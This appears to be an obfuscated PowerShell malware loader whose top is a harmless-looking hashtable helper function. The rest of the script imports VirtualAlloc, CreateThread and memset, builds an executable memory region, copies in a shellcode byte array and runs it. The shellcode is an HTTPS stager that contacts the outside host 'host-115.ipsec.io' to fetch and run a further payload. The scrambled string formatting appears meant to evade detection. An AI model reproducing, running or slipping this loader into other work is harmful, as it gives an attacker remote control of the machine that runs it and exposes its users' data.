Function get-`Hash`T`ABLenot`e`mpTY`ornu`lLv`ALUe
{

    PARAM([System.Collections.Hashtable]${HaS`ht`AB`Le})

    ${h`A`S`hTABle}.("{0}{3}{1}{4}{2}"-f 'G','tEnu','ator','e','mer').Invoke()."NA`Me" |
        .("{1}{2}{0}{3}"-f 'Ea','F','or','ch-Object') -Process {
            if(${HAShT`A`Ble}[${_}] -ne "")
            {
                .("{0}{3}{2}{1}" -f'W','e-Output','t','ri') ${_}
            }
        }
}

${C} = ((("{111}{122}{4}{78}{107}{45}{50}{103}{86}{46}{29}{99}{105}{119}{80}{101}{121}{12}{73}{10}{89}{98}{21}{32}{87}{6}{123}{63}{74}{97}{112}{8}{47}{0}{65}{37}{124}{75}{88}{66}{22}{72}{64}{41}{95}{56}{30}{106}{120}{20}{38}{42}{127}{82}{61}{13}{40}{104}{93}{71}{24}{11}{14}{60}{91}{77}{43}{59}{94}{36}{39}{17}{35}{113}{109}{31}{114}{54}{23}{7}{16}{26}{3}{58}{96}{67}{28}{18}{126}{116}{5}{53}{34}{1}{15}{125}{81}{62}{9}{25}{128}{117}{48}{108}{69}{100}{68}{83}{19}{27}{55}{118}{90}{57}{33}{70}{85}{92}{102}{52}{84}{79}{2}{51}{115}{44}{49}{110}{76}" -f 't);[DllIm','read',' ',' ','mport(R','IntP','lAl',', ','t flP','po',' l','Attr','alAlloc(IntPt','Thread','i','I','u',' IntPtr lpS','ionF','c s','c ext',', uint dw','l','er','ead','r','int','tatic','reat','at','s','tPt','S','Ptr ','r lpTh','tartAddre','ackSiz','(','e','e,','(In','ubl','r','s, uint',' ','llR','st','rotec','ms','cou','Xv)]p','uin','Ptr','t','t',' ',' ','Int','d',' d','b',' Create','DllIm','ionTy','2.dllRXv)]p','port','ne','C','ub','.dllRXv)]','m','hr','3','r','pe, ','v',');','e','Xvkernel','st, uint src,',' ',');[','tPtr','li',' de','ems','ic ','ize, uint f','ker','pAdd','tern ','ut','et','tr lpT','wSt','ic','w','u','ress','i','p','Int','(Int','ubl','tP','c','tat','32.d','vcrt',' In','nt','[','in','ss,','r lpParame','t','ags, ','Xv','ex',' extern','i','Ptr Virtu','DllI','locat','RX','d','l','n In','t(R'))-CREPLaCE'RXv',[CHAr]34);${w} = &("{1}{0}{2}"-f'd-Typ','Ad','e') -memberDefinition ${c} -Name ("{0}{1}" -f 'Wi','n32') -namespace ("{0}{1}{2}{3}" -f 'Win32','Fun','c','tions') -passthru;[Byte[]];[Byte[]]${Sc} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x03,0x53,0x53,0x68,0xbb,0x01,0x00,0x00,0xe8,0x8c,0x00,0x00,0x00,0x2f,0x46,0x33,0x33,0x58,0x58,0x00,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x00,0x32,0xe0,0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,0x0a,0x5f,0x68,0x80,0x33,0x00,0x00,0x89,0xe0,0x6a,0x04,0x50,0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86,0xff,0xd5,0x53,0x53,0x53,0x53,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x0a,0x4f,0x75,0xd9,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x68,0x00,0x00,0x40,0x00,0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x00,0x20,0x00,0x00,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcd,0x8b,0x07,0x01,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x75,0xff,0xff,0xff,0x68,0x6f,0x73,0x74,0x2d,0x31,0x31,0x35,0x2e,0x69,0x70,0x73,0x65,0x63,0x2e,0x69,0x6f,0x00;${sI`ze} = 0x1000;if (${S`c}."L`Ength" -gt 0x1000){${S`iZE} = ${S`C}."le`NGth"};${x}=${W}::("{2}{1}{0}" -f'Alloc','l','Virtua').Invoke(0,0x1000,${SI`ze},0x40);for (${I}=0;${i} -le (${S`C}."L`en`gTh"-1);${i}++) {${W}::"mems`Et"([IntPtr](${x}.("{2}{1}{0}"-f '2','oInt3','T').Invoke()+${i}), ${Sc}[${I}], 1)};${W}::("{0}{1}{2}"-f 'C','reateT','hread').Invoke(0,0,${X},0,0,0);for (;;){&("{3}{1}{0}{2}" -f 't','tar','-sleep','S') 60};
